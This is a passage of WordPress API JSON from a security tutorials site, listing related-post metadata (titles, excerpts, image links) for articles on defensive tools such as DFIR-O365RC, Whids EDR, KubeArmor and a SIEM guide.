https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjlTp6nxGowqEgeEGbLN3yBo2-weWppdHV9kWsvWQ6qoAuUNwpIZjsl_yRuYCWYdAt-LeD1jXNpauQwwMZhpe6jvMgv6f6fy5WHdvOWH82manv6_RRS3nEw6GVY9U5yNs0txjuGY2qAj1vrPDkfX0tBaNuh5Jgq_Z-ePVkBiXVyvdowS2j_Mbeni87V\/s16000\/auto.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjlTp6nxGowqEgeEGbLN3yBo2-weWppdHV9kWsvWQ6qoAuUNwpIZjsl_yRuYCWYdAt-LeD1jXNpauQwwMZhpe6jvMgv6f6fy5WHdvOWH82manv6_RRS3nEw6GVY9U5yNs0txjuGY2qAj1vrPDkfX0tBaNuh5Jgq_Z-ePVkBiXVyvdowS2j_Mbeni87V\/s16000\/auto.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":13128,"url":"https:\/\/kalilinuxtutorials.com\/dfir-o365rc-power\/","url_meta":{"origin":26391,"position":1},"title":"DFIR-O365RC : PowerShell Module For Office 365 And Azure AD Log Collection","author":"R K","date":"May 30, 2021","format":false,"excerpt":"The DFIR-O365RC PowerShell module is a set of functions that allow the DFIR analyst to collect logs relevant for Office 365 Business Email Compromise investigations. The logs are generated in JSON format and retrieved from two main data sources: Office 365\u00a0Unified Audit Logs.Azure AD\u00a0sign-ins logs\u00a0and\u00a0audit logs. The two data sources\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":810,"url":"https:\/\/kalilinuxtutorials.com\/a-beginners-guide-to-siem\/","url_meta":{"origin":26391,"position":2},"title":"What is SIEM? Complete Guide to Security Information and Event Management","author":"0xSnow","date":"September 10, 2025","format":false,"excerpt":"Introduction As cyber threats grow more sophisticated, organizations need more than just firewalls and antivirus tools. 
They require complete visibility into their IT environment, covering user activities, endpoint logs, application events, and network traffic. This is where SIEM (Security Information and Event Management) comes in. A SIEM solution collects, normalizes,\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"what is siem?","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2022\/12\/what-is-siem.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2022\/12\/what-is-siem.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2022\/12\/what-is-siem.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2022\/12\/what-is-siem.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2022\/12\/what-is-siem.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2022\/12\/what-is-siem.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":27567,"url":"https:\/\/kalilinuxtutorials.com\/whids\/","url_meta":{"origin":26391,"position":3},"title":"Whids : Open Source EDR For Windows","author":"R K","date":"November 8, 2022","format":false,"excerpt":"Whids is a Open Source EDR For Windows with artifact collection driven by detection. The detection engine is built on top of a previous project Gene specially designed to match Windows events against user defined rules. What do you mean by \"artifact collection driven by detection\" ? 
It means that\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2urF1S0OvBE6IzkjQZrzZn55_aysRK-SZZcjnhCxQr0ZHwpjuhDWb9SOzrl-OyWciQk0k8qqfSO5-0tpIuObDLrZJd_0M7nsBL0tkRcYUyMEprJENKJe3T6HXWXehtzEmipbNbBagYuuq-CUuIQIi-M3mHmp9g1JFOyDu8go8AGQv8wsUt6nDj76_\/s728\/whids.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2urF1S0OvBE6IzkjQZrzZn55_aysRK-SZZcjnhCxQr0ZHwpjuhDWb9SOzrl-OyWciQk0k8qqfSO5-0tpIuObDLrZJd_0M7nsBL0tkRcYUyMEprJENKJe3T6HXWXehtzEmipbNbBagYuuq-CUuIQIi-M3mHmp9g1JFOyDu8go8AGQv8wsUt6nDj76_\/s728\/whids.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2urF1S0OvBE6IzkjQZrzZn55_aysRK-SZZcjnhCxQr0ZHwpjuhDWb9SOzrl-OyWciQk0k8qqfSO5-0tpIuObDLrZJd_0M7nsBL0tkRcYUyMEprJENKJe3T6HXWXehtzEmipbNbBagYuuq-CUuIQIi-M3mHmp9g1JFOyDu8go8AGQv8wsUt6nDj76_\/s728\/whids.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi2urF1S0OvBE6IzkjQZrzZn55_aysRK-SZZcjnhCxQr0ZHwpjuhDWb9SOzrl-OyWciQk0k8qqfSO5-0tpIuObDLrZJd_0M7nsBL0tkRcYUyMEprJENKJe3T6HXWXehtzEmipbNbBagYuuq-CUuIQIi-M3mHmp9g1JFOyDu8go8AGQv8wsUt6nDj76_\/s728\/whids.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":12902,"url":"https:\/\/kalilinuxtutorials.com\/kubearmor-container-aware-runtime-security-enforcement-system\/","url_meta":{"origin":26391,"position":4},"title":"KubeArmor : Container-aware Runtime Security Enforcement System","author":"R K","date":"May 17, 2021","format":false,"excerpt":"Introduction to KubeArmor KubeArmor is a container-aware runtime security enforcement system that restricts the behavior (such as process execution, file access, networking operation, and resource utilization) of containers at the 
system level. KubeArmor operates with\u00a0Linux security modules (LSMs), meaning that it can work on top of any Linux platforms (such\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":34488,"url":"https:\/\/kalilinuxtutorials.com\/office-365-extractor\/","url_meta":{"origin":26391,"position":5},"title":"Office 365 Extractor &#8211; A Complete Guide To Extracting Audit Logs And Enhancing Forensic Investigations","author":"Varshini","date":"August 19, 2024","format":false,"excerpt":"This script makes it possible to extract log data out of an Office365 environment. The script created by us consist out of four main options, which enable the investigator to easily extract logging out of an Office365 environment. Show available log sources and amount of logging Extract all audit logging\u2026","rel":"","context":"In &quot;Forensics&quot;","block_context":{"text":"Forensics","link":"https:\/\/kalilinuxtutorials.com\/category\/f\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg4lpTYHzZsOChfj2T85B9AI6t2WbveZkRFiPYbs7OvnKOfRGRtkJXZahfP04No99PwRgGtHVmVSh-8_4u2C43PqOIVbWl8vPefYTHFylgRJtk4bG21s7ZSky4TVKFX1uCc8gtiRj6yUdDkU22yM_qgXcDnDzrJadjuMT5CYBqlbWAagYon5rMFefCWMOPc\/s16000\/Office%20365%20Extractor.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg4lpTYHzZsOChfj2T85B9AI6t2WbveZkRFiPYbs7OvnKOfRGRtkJXZahfP04No99PwRgGtHVmVSh-8_4u2C43PqOIVbWl8vPefYTHFylgRJtk4bG21s7ZSky4TVKFX1uCc8gtiRj6yUdDkU22yM_qgXcDnDzrJadjuMT5CYBqlbWAagYon5rMFefCWMOPc\/s16000\/Office%20365%20Extractor.webp?resize=350%2C200&ssl=1 1x, 
https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg4lpTYHzZsOChfj2T85B9AI6t2WbveZkRFiPYbs7OvnKOfRGRtkJXZahfP04No99PwRgGtHVmVSh-8_4u2C43PqOIVbWl8vPefYTHFylgRJtk4bG21s7ZSky4TVKFX1uCc8gtiRj6yUdDkU22yM_qgXcDnDzrJadjuMT5CYBqlbWAagYon5rMFefCWMOPc\/s16000\/Office%20365%20Extractor.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg4lpTYHzZsOChfj2T85B9AI6t2WbveZkRFiPYbs7OvnKOfRGRtkJXZahfP04No99PwRgGtHVmVSh-8_4u2C43PqOIVbWl8vPefYTHFylgRJtk4bG21s7ZSky4TVKFX1uCc8gtiRj6yUdDkU22yM_qgXcDnDzrJadjuMT5CYBqlbWAagYon5rMFefCWMOPc\/s16000\/Office%20365%20Extractor.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg4lpTYHzZsOChfj2T85B9AI6t2WbveZkRFiPYbs7OvnKOfRGRtkJXZahfP04No99PwRgGtHVmVSh-8_4u2C43PqOIVbWl8vPefYTHFylgRJtk4bG21s7ZSky4TVKFX1uCc8gtiRj6yUdDkU22yM_qgXcDnDzrJadjuMT5CYBqlbWAagYon5rMFefCWMOPc\/s16000\/Office%20365%20Extractor.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg4lpTYHzZsOChfj2T85B9AI6t2WbveZkRFiPYbs7OvnKOfRGRtkJXZahfP04No99PwRgGtHVmVSh-8_4u2C43PqOIVbWl8vPefYTHFylgRJtk4bG21s7ZSky4TVKFX1uCc8gtiRj6yUdDkU22yM_qgXcDnDzrJadjuMT5CYBqlbWAagYon5rMFefCWMOPc\/s16000\/Office%20365%20Extractor.webp?resize=1400%2C800&ssl=1 
4x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/26391","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=26391"}],"version-history":[{"count":8,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/26391\/revisions"}],"predecessor-version":[{"id":26559,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/26391\/revisions\/26559"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/26400"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=26391"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=26391"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=26391"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}